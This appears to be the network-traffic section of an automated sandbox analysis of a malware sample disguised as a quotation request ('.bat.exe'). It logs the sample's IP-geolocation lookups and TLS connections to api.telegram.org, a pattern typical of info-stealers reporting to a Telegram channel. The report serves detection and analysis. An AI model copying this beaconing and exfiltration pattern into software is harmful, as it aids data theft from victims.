                                                                                                            Nov 20, 2024 09:33:12.962155104 CET8049728158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.141437054 CET44349727188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.143080950 CET49727443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.143096924 CET44349727188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.280395985 CET44349727188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.280466080 CET44349727188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.280581951 CET49727443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.281014919 CET49727443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.284708023 CET4972580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:13.285775900 CET4972980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:13.290664911 CET8049725158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.290781975 CET4972580192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:13.290972948 CET8049729158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.291044950 CET4972980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:13.291140079 CET4972980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:13.296145916 CET8049729158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.549091101 CET8049728158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.550421953 CET49730443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.550457001 CET44349730188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.550520897 CET49730443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.550900936 CET49730443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.550915003 CET44349730188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.600764990 CET4972880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:13.953402042 CET8049729158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.954750061 CET49731443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.954818010 CET44349731188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:13.954888105 CET49731443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.955137968 CET49731443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:13.955167055 CET44349731188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.001102924 CET4972980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.022783995 CET44349730188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.025031090 CET49730443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.025055885 CET44349730188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.166141033 CET44349730188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.166305065 CET44349730188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.166383028 CET49730443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.167002916 CET49730443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.171427965 CET4972880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.172769070 CET4973280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.178489923 CET8049728158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.178548098 CET4972880192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.178940058 CET8049732158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.179002047 CET4973280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.179128885 CET4973280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.184191942 CET8049732158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.438608885 CET44349731188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.440210104 CET49731443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.440296888 CET44349731188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.573071003 CET44349731188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.573232889 CET44349731188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.573410988 CET49731443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.573690891 CET49731443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.577251911 CET4972980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.578392982 CET4973380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.582863092 CET8049729158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.582923889 CET4972980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.585856915 CET8049733158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.585931063 CET4973380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.586076975 CET4973380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:14.591049910 CET8049733158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.743051052 CET8049732158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.754311085 CET49734443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.754386902 CET44349734188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.754700899 CET49734443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.754945993 CET49734443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:14.754980087 CET44349734188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:14.788280964 CET4973280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.163778067 CET8049733158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.165056944 CET49735443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.165086031 CET44349735188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.165180922 CET49735443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.165585041 CET49735443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.165601015 CET44349735188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.210133076 CET4973380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.230761051 CET44349734188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.232309103 CET49734443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.232397079 CET44349734188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.367661953 CET44349734188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.367731094 CET44349734188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.367908955 CET49734443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.369338989 CET49734443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.375242949 CET4973680192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.375437975 CET4973280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.380822897 CET8049736158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.380914927 CET4973680192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.381143093 CET4973680192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.381263018 CET8049732158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.381308079 CET4973280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.385932922 CET8049736158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.645917892 CET44349735188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.647557020 CET49735443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.647598982 CET44349735188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.821166992 CET44349735188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.821314096 CET44349735188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.821382999 CET49735443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.821751118 CET49735443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.836456060 CET4973380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.841675043 CET8049733158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.841737032 CET4973380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:15.844667912 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:15.844713926 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.844902039 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:15.845293045 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:15.845321894 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.979320049 CET8049736158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.980911970 CET49738443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.980953932 CET44349738188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.981057882 CET49738443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.981372118 CET49738443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:15.981389999 CET44349738188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.022677898 CET4973680192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:16.461740971 CET44349738188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.463476896 CET49738443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:16.463495970 CET44349738188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.463676929 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.463761091 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:16.466258049 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:16.466295004 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.466593027 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.473602057 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:16.519320965 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.618411064 CET44349738188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.618571997 CET44349738188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.618635893 CET49738443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:16.619050980 CET49738443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:16.622715950 CET4973680192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:16.623971939 CET4973980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:16.628694057 CET8049736158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.628767967 CET4973680192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:16.630572081 CET8049739158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.630639076 CET4973980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:16.630717993 CET4973980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:16.636272907 CET8049739158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.707295895 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.707648039 CET44349737149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:16.707731962 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:16.711829901 CET49737443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:17.197326899 CET8049739158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.199676037 CET49740443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:17.199774981 CET44349740188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.199858904 CET49740443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:17.200129986 CET49740443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:17.200145960 CET44349740188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.241405964 CET4973980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:17.659507036 CET44349740188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.661083937 CET49740443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:17.661096096 CET44349740188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.792982101 CET44349740188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.793054104 CET44349740188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.793104887 CET49740443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:17.793524027 CET49740443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:17.796672106 CET4973980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:17.797800064 CET4974380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:17.804244995 CET8049739158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.804337025 CET4973980192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:17.805160999 CET8049743158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:17.805243969 CET4974380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:17.805315018 CET4974380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:17.811903000 CET8049743158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:18.400226116 CET8049743158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:18.418900967 CET49745443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:18.418948889 CET44349745188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:18.419004917 CET49745443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:18.420069933 CET49745443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:18.420087099 CET44349745188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:18.444535971 CET4974380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:18.990963936 CET44349745188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:18.993304014 CET49745443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:18.993325949 CET44349745188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.152592897 CET44349745188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.152657032 CET44349745188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.152945042 CET49745443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:19.153350115 CET49745443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:19.155973911 CET4974380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:19.157165051 CET4975380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:19.164073944 CET8049743158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.164141893 CET4974380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:19.165177107 CET8049753158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.165353060 CET4975380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:19.165551901 CET4975380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:19.173289061 CET8049753158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.734417915 CET8049753158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.735908031 CET49760443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:19.735987902 CET44349760188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.736059904 CET49760443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:19.736658096 CET49760443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:19.736689091 CET44349760188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:19.788348913 CET4975380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:20.205120087 CET44349760188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:20.257072926 CET49760443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:20.341272116 CET49760443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:20.341294050 CET44349760188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:20.453027010 CET44349760188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:20.453102112 CET44349760188.114.96.3192.168.2.5
                                                                                                            Nov 20, 2024 09:33:20.453181028 CET49760443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:20.453552961 CET49760443192.168.2.5188.114.96.3
                                                                                                            Nov 20, 2024 09:33:20.464346886 CET4975380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:20.465114117 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:20.465172052 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:20.465260029 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:20.465756893 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:20.465774059 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:20.474101067 CET8049753158.101.44.242192.168.2.5
                                                                                                            Nov 20, 2024 09:33:20.474157095 CET4975380192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:21.077470064 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:21.077668905 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:21.080571890 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:21.080581903 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:21.080883026 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:21.132040024 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:21.181215048 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:21.223360062 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:21.502325058 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:21.502408028 CET44349767149.154.167.220192.168.2.5
                                                                                                            Nov 20, 2024 09:33:21.502507925 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:21.505280972 CET49767443192.168.2.5149.154.167.220
                                                                                                            Nov 20, 2024 09:33:21.949748039 CET4971280192.168.2.5158.101.44.242
                                                                                                            Nov 20, 2024 09:33:26.677536964 CET4972480192.168.2.5158.101.44.242
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 20, 2024 09:33:04.610477924 CET6078353192.168.2.51.1.1.1
                                                                                                            Nov 20, 2024 09:33:04.619577885 CET53607831.1.1.1192.168.2.5
                                                                                                            Nov 20, 2024 09:33:05.405869961 CET5772253192.168.2.51.1.1.1
                                                                                                            Nov 20, 2024 09:33:05.416461945 CET53577221.1.1.1192.168.2.5
                                                                                                            Nov 20, 2024 09:33:15.837233067 CET5928953192.168.2.51.1.1.1
                                                                                                            Nov 20, 2024 09:33:15.843918085 CET53592891.1.1.1192.168.2.5
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 20, 2024 09:33:04.610477924 CET192.168.2.51.1.1.10xd01bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:05.405869961 CET192.168.2.51.1.1.10xa00Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:15.837233067 CET192.168.2.51.1.1.10xcdb8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 20, 2024 09:33:04.619577885 CET1.1.1.1192.168.2.50xd01bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:04.619577885 CET1.1.1.1192.168.2.50xd01bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:04.619577885 CET1.1.1.1192.168.2.50xd01bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:04.619577885 CET1.1.1.1192.168.2.50xd01bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:04.619577885 CET1.1.1.1192.168.2.50xd01bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:04.619577885 CET1.1.1.1192.168.2.50xd01bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:05.416461945 CET1.1.1.1192.168.2.50xa00No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:05.416461945 CET1.1.1.1192.168.2.50xa00No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 09:33:15.843918085 CET1.1.1.1192.168.2.50xcdb8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.549708158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:04.635445118 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:05.200486898 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:05 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 29f99dac374806dd4c896d15469c2a66
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                            Nov 20, 2024 09:33:05.207741976 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 20, 2024 09:33:05.363385916 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:05 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: e700707834115db3f7d36b9a97b3ece0
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                            Nov 20, 2024 09:33:06.344805002 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 20, 2024 09:33:06.502743959 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:06 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 834b8cd65762e6c04d9a4f1220af61fb
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.549712158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:07.136194944 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Nov 20, 2024 09:33:07.719619989 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:07 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 5121e5a452757addb9276bf35aa8549c
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.549715158.101.44.242805268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 09:33:08.383829117 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 09:33:08.983076096 CET320INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:08 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
